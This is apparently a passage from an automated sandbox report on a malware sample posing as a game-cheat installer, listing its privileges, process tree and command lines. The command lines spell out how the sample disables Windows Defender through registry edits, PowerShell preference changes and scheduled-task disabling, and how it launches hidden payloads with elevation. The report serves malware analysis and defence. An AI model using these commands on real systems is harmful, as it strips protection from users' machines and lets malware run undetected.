Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1208 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe
PID 1208 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe
PID 1208 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe
PID 5108 wrote to memory of 1492 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5108 wrote to memory of 1492 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5108 wrote to memory of 1492 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 5108 wrote to memory of 4680 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5108 wrote to memory of 4680 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5108 wrote to memory of 4680 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4680 wrote to memory of 4464 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4680 wrote to memory of 4464 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4464 wrote to memory of 3040 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4464 wrote to memory of 3040 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3040 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4204 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4204 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4204 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 5108 wrote to memory of 4436 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5108 wrote to memory of 4436 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5108 wrote to memory of 4436 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3040 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 3000 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 3000 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 3000 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2196 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2196 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2196 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4320 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4320 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 4320 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3040 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 8CBFA6B92CDFD7CB9E85C09B2E79E22D C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710548509 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 8B4D29A1C562749B3DABB2E14B7E0E6C

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss82CF.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi82CC.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr82CD.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr82CE.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 1D610F836AC0F16AEB5306772CDC3271 E Global\MSI0000

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSI1E94.tmp

"C:\Windows\Installer\MSI1E94.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1E97.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi1E94.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr1E95.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr1E96.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2054.tmp\2055.tmp\2056.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"

C:\Windows\Installer\MSI4150.tmp

"C:\Windows\Installer\MSI4150.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Windows\Installer\MSI4151.tmp

"C:\Windows\Installer\MSI4151.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\Installer\MSI4162.tmp

"C:\Windows\Installer\MSI4162.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

